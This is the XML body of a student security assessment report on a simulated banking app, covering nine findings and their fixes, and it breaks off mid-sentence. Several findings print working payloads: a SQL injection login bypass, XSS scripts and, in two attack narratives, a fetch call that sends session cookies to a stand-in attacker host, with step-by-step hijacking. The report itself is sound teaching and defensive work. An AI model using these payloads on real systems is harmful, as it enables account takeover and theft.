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776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="1440" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Makerere University</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>College of Computing and Information Sciences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Department of Networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">BSE 4202: Software </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Security - Practical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Assignment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="400" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>SECURITY ASSESSMENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="100" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8TechBank: Simulated Online Banking Portal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="600" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Prepared by: Kitonsa Elvis</w:t>
      </w:r>
      <w:r w:rsidR="009755AE">
        <w:t xml:space="preserve"> (20/U/7785/PS)</w:t>
      </w:r>
      <w:r>
        <w:t>, Katuramu Edgar</w:t>
      </w:r>
      <w:r w:rsidR="009755AE">
        <w:t xml:space="preserve"> (22/U/21756/PS)</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Asiimire Patricia</w:t>
      </w:r>
      <w:r w:rsidR="009755AE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (21/U/19271/PS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, Kizito Daniel Jr.</w:t>
      </w:r>
      <w:r w:rsidR="009755AE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (19/U/8282/EVE</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="009755AE">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Group BSE26-9 | Year IV Semester II, 2025/26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lecturer: Dr. Drake Patrick Mirembe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Date: May 2026</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>This security assessment was conducted on 8TechBank, a simulated online banking portal developed as part of the BSE 4202 Software Security practical assignment. The assessment involved manual code review, deliberate vulnerability embedding, dynamic exploitation, and implementation of secure code fixes. The objective was to simulate the work of a professional security engineer conducting a full application security review.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The assessment identified nine distinct vulnerabilities across the application codebase. Two vulnerabilities were rated Critical, five were rated High, and two were rated Medium severity. No Low severity vulnerabilities were identified. The overall risk posture of the vulnerable version of 8TechBank is assessed as </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Critical - the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> application in its unpatched state is unsuitable for any production deployment and poses severe risk to customer financial data and account security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>All nine vulnerabilities have been remediated in the secure version of the application. A defense-in-depth approach was applied, addressing root causes rather than superficial symptoms. The three most critical actions recommended for any real banking application are as follows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">First, all SQL queries must use parameterized statements. The SQL injection vulnerability identified in the login route represents a complete authentication bypass and database extraction risk and must be treated as the highest priority remediation. Second, all user-supplied input rendered in HTML must be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>properly encoded and a Content Security Policy header must be deployed to block inline script execution. Third, all state-changing web forms must implement CSRF token validation to prevent unauthorized fund transfers initiated by malicious third-party websites.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The security assessment followed the OWASP Testing Guide v4.2 methodology, adapted for a white-box assessment where full source code access was available. The assessment was conducted in four phases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.1 Static Code Review</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The application source code in src/vulnerable/app.py and associated HTML templates were manually reviewed line by line. Each route handler, database query, template rendering call, and configuration setting was examined for security weaknesses. Findings were mapped to CWE identifiers and OWASP Top 10 2021 categories. Severity was rated using NIST CVSS v3.1 scoring.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2 Dynamic Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The vulnerable application was deployed locally on http://127.0.0.1:5000 and subjected to active exploitation attempts. Each identified vulnerability was tested with a working proof-of-concept payload. Screenshots were captured at each stage to document successful exploitation. Tools used included the browser Developer Tools, Firefox network inspector, and PowerShell Invoke-WebRequest for API testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.3 Secure Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Following exploitation, a secure version of the application was developed in src/secure/app.py applying defense-in-depth fixes. The secure version was deployed on http://127.0.0.1:5001 and each previously successful exploit was retested to confirm </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>neutralization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.4 Scope and Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The assessment was limited to the 8TechBank application running on localhost. No external systems, network infrastructure, or third-party services were tested. The assessment does not constitute a full penetration test and additional vulnerabilities may exist beyond those identified here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="2" w:space="1" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3. Findings and Risk Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The following table </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>summarizes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> all nine vulnerabilities identified, sorted by severity from Critical to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644"/>
        <w:gridCol w:w="1322"/>
        <w:gridCol w:w="2424"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="1388"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A1776E">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No.</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Vulnerability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CWE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OWASP</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CVSS</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Severity</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SQL Injection in Login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CWE-89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A03 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000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.8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000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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2</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Hardcoded Weak Secret Key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CWE-798</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A02 Crypto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000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.1</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000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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lastRenderedPageBreak/>
              <w:t>3</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Stored XSS in Transaction Notes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CWE-79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A03 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8.8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High</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4</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Missing CSRF on Fund Transfer</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CWE-352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A01 Broken Access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8.8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High</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5</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IDOR on Account View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CWE-639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A01 Broken Access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7.5</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High</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6</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Plaintext Password Storage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CWE-256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A02 Crypto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7.5</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High</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7</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Reflected XSS in Search</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CWE-79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A03 Injection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7.4</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High</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8</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Debug Mode Enabled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CWE-94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A05 Misconfiguration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5.3</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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A1776E">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9</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Missing Secure Session Config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CWE-614</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A07 Auth Failures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5.4</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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 - SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection in Login (Critical, CVSS 9.8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The login route at /login constructed SQL queries using Python f-string concatenation, directly embedding user-supplied input into the query string. An attacker entering admin' -- as the username caused the database to ignore the password check entirely, granting immediate admin access. A UNION-based payload further extracted all usernames and passwords from the database. This vulnerability was successfully exploited during testing as documented in exploit screenshots exploit-a-1-sqli-bypass.png and exploit-a-2-union-result.png. Business impact: complete authentication bypass and full database compromise. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2 - Hardcoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Weak Secret Key (Critical, CVSS 9.1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The Flask application secret key was hardcoded as the string supersecretkey123 in plain text in app.py. Flask uses this key to cryptographically sign session cookies. An attacker with access to the source code could forge valid session cookies and impersonate any user including the administrator without any credentials. Business impact: complete session hijacking for all users. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 - Stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS in Transaction Notes (High, CVSS 8.8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The fund transfer route stored user-supplied transaction notes directly in the database without </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sanitization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. The dashboard template rendered these notes using the Jinja2 pipe safe filter, disabling auto-escaping. A JavaScript payload submitted as a transaction note executed in the browser of every user who viewed their transaction history. During testing, the payload alert('STORED XSS - Cookie: ' + document.cookie) successfully displayed the session cookie. Business impact: persistent session hijacking for all users who view transactions. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B970AF" w:rsidRDefault="00B970AF">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Session Hijacking Attack Narrative:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Once the stored XSS payload fires and the alert displays the victim's session cookie value, a real attacker would follow these steps. Step 1 — the attacker submits the malicious transaction note containing a more sophisticated payload that silently sends the cookie to an attacker-controlled server rather than displaying an alert, for example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>&lt;script&gt;fetch('https://attacker.com/steal?c='+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Step 2 — whenever any 8TechBank user views their transaction history, their browser executes this script and their session cookie is transmitted to the attacker's server in the background without any visible indication. Step 3 — the attacker copies the stolen cookie value from their server logs. Step 4 — the attacker opens 8TechBank in their own browser, opens Developer Tools, navigates to Storage, and manually sets their session cookie to the stolen value. Step 5 — the attacker refreshes the page and is now </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>fully authenticated as the victim user, with complete access to their account, balance, and transfer functionality, without ever knowing the victim's password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4 - Missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF Protection (High, CVSS 8.8)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The fund transfer endpoint accepted POST requests with no CSRF token validation. A malicious HTML page with a hidden auto-submitting form was able to execute a UGX 500 transfer from </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> account to the attacker's account simply by being opened in the same browser while </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> was authenticated. The balance dropped from UGX 4899 to UGX 4399 as documented in exploit-c-csrf-before.png and exploit-c-csrf-after.png. Business impact: </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>unauthorized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> fund transfers without victim's knowledge. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5 - IDOR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Account View (High, CVSS 7.5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">The account details route /account/&lt;id&gt; fetched account records by ID without verifying that the requesting user owned the account. By changing the ID in the URL from 1 to 2 or 3, </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Alice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> was able to view bob's and admin's full account details, balances, email addresses, and transaction histories. Business impact: full exposure of all customer financial and personal data to any authenticated user. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6 - Plaintext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password Storage (High, CVSS 7.5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>User passwords were stored and compared in plaintext in the SQLite database. The admin panel displayed all passwords visibly. Any database read access immediately yielded every user's credentials with no cracking effort required. Business impact: immediate credential compromise for all users upon any database exposure. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7 Finding </w:t>
      </w:r>
      <w:r w:rsidR="00E749B7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7 - Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS in Search (High, CVSS 7.4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1776E" w:rsidRDefault="009C14D2">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The search route returned user input directly embedded in an HTML response string using an f-string with no encoding. The payload &lt;script&gt;alert(document.cookie)&lt;/script&gt; executed immediately and displayed the session cookie value in an alert dialog. Business impact: session hijacking via crafted URL, enabling phishing attacks against customers. Status: Fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE53EC" w:rsidRDefault="00AE53EC">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Session Hijacking Attack Narrative:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> To exploit the reflected XSS for session hijacking, an attacker would craft a malicious URL such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>http://127.0.0.1:5000/search?q=&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>fetch(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
        </w:rPr>
        <w:t>'https://attacker.com/steal?c='+document.cookie)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and disguise it using a URL </w:t>
      </w:r>
